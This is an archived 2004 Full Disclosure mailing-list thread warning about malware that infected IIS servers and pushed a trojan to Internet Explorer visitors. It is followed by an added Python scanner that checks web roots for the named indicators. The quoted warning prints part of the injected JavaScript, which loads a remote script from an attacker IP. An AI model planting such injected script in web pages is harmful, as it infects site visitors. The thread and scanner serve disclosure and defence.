Full Disclosure mailing list archives

Re: New malware to infect IIS and from there jump to clients


From: <bills.bitch () hushmail com>
Date: Fri, 25 Jun 2004 08:01:33 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This is impossible. Microsoft products are inherently secure. We have
a patched IIS as stated by the alert, an alpha security patch for the
operating system and open holes in the browser. No doubt this is a vicious
anti-Microsoft attempt to discredit their security commitments by people
who are jealous of Bill Gates' wealth. That or maybe by disgruntled individuals
who failed to earn their MVP status.

For the IIS side....

http://www.microsoft.com/security/incident/download_ject.mspx



Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.

Important: Customers who have deployed Windows XP Service Pack 2 RC2
are not at risk.

Reports indicate that Web servers running Windows 2000 Server and IIS
that have not applied update 835732, which was addressed by Microsoft
Security Bulletin MS04-011, are possibly being compromised and being
used to attempt to infect users of Internet Explorer with malicious code.

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com] On Behalf Of Peter Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] New malware to infect IIS and from there jump to
clients

Hi all,

This is a heads up.

A new malware has been reported from several sources, so it appears to be
fairly widespread already.

The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers were compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).

The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a javascript that apparently gets appended to several files in
the webfolder of IIS (e.g. .html, .txt, .gif). The webpage loads
http://217.107.218.147/xxx.html, which contains the following code:

<script language="Javascript">

    function InjectedDuringRedirection(){
     showModalDialog('md.htm', window, "dialog
Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
:1\;").location= " java script:'<SCRIPT  SRC =\\' http://
217.107.218.147/shellxxx.js\\'> <\ /script>'";

[snip - you get the picture, right?]

I had to put in some spaces to get past trivial content filtering.

From that point it will try to run the malware in a 1x1 dialog box in the
following order:

shellscript_loadxxx.js
shellxxx.js

The shellxxx.js will try to drop "msits.exe" (51.712 bytes), a
trojan-downloader, and run it.

Consider denying access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.

Further information can be found in the daily log from SANS:
http://isc.sans.org/

Regards
Peter Kruse
http://www.csis.dk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDcPmgACgkQ9hJzGKhH2Ld2CgCguxLYUab6EyIAef5qK5YVBK3JDX0A
n1iDB7VSzmP2NVQyeldO+9agWW8q
=Uc5R
-----END PGP SIGNATURE-----
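As an added example (not part of either message above, and not Microsoft's or CSIS's tooling), the following Python script turns Peter Kruse's description into a host-side check: it walks an IIS web root and flags files carrying the indicators his heads-up names (the redirect host 217.107.218.147 and the xxx.php / xxx.html / shellxxx.js / shellscript_loadxxx.js names), plus any <script> tag found inside a .gif, which is never legitimate. The web-root layout and sample files are constructed here purely to exercise the scanner; the whitespace-tolerant host pattern is an assumption based on the stray spaces visible in the posted snippet.

```python
"""Scan a web root for the appended-JavaScript footprint described in the
Download.Ject heads-up. Added example; indicators are the ones quoted in
the original post, sample files below are constructed for the demo."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Indicators taken from the original heads-up.
IOC_HOST = "217.107.218.147"
IOC_NAMES = ("shellxxx.js", "shellscript_loadxxx.js", "xxx.php", "xxx.html")

# File types the post says the script was appended to (plus .asp/.js, an
# assumption: any text served by IIS could carry the same appended block).
SCAN_SUFFIXES = {".html", ".htm", ".txt", ".gif", ".asp", ".js"}

# The posted snippet contained stray spaces, so tolerate whitespace inside
# the dotted quad rather than matching the exact string (assumption).
_HOST_RE = re.compile(r"217\s*\.\s*107\s*\.\s*218\s*\.\s*147")
_TAG_RE = re.compile(rb"<\s*script[^>]*>", re.IGNORECASE)


def indicators_in(data: bytes) -> List[str]:
    """Return the list of page-derived indicators present in a file's bytes."""
    text = data.decode("latin-1")  # 1:1 byte mapping, safe for binary files
    hits = []
    if _HOST_RE.search(text):
        hits.append("host:" + IOC_HOST)
    for name in IOC_NAMES:
        if name in text:
            hits.append("script:" + name)
    return hits


def script_tag_in_gif(path: Path, data: bytes) -> bool:
    """A <script> tag inside an image file is the appended-code footprint."""
    return path.suffix.lower() == ".gif" and _TAG_RE.search(data) is not None


def scan_webroot(root) -> Dict[str, List[str]]:
    """Map each suspicious file (relative path) to the indicators found."""
    findings: Dict[str, List[str]] = {}
    base = Path(root)
    for path in base.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        data = path.read_bytes()
        hits = indicators_in(data)
        if script_tag_in_gif(path, data):
            hits.append("script-tag-in-gif")
        if hits:
            findings[str(path.relative_to(base))] = hits
    return findings


def build_sample_webroot() -> str:
    """Constructed sample web root: three files with an appended block
    that carries the indicators, two clean files."""
    root = tempfile.mkdtemp(prefix="iis-scan-")
    base = Path(root)
    appended = (b'\n<script language="Javascript">\n'
                b"// constructed stand-in for the appended redirect block\n"
                b"var target = 'http://217.107.218.147/xxx.html';\n"
                b"</script>\n")
    (base / "default.htm").write_bytes(b"<html><body>Welcome</body></html>" + appended)
    (base / "readme.txt").write_bytes(b"plain text" + appended)
    (base / "logo.gif").write_bytes(b"GIF89a\x01\x00\x01\x00" + appended)
    (base / "clean.html").write_bytes(b"<html><body>Clean</body></html>")
    (base / "images").mkdir()
    (base / "images" / "clean.gif").write_bytes(b"GIF89a\x01\x00\x01\x00\x00")
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_webroot(build_sample_webroot()).items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run it against a real web root by calling scan_webroot() with the site's directory; a hit in any .gif, or a host indicator in any file, is a strong sign the server is in the compromised state the post describes, and the affected files should be restored from a known-good copy rather than edited in place.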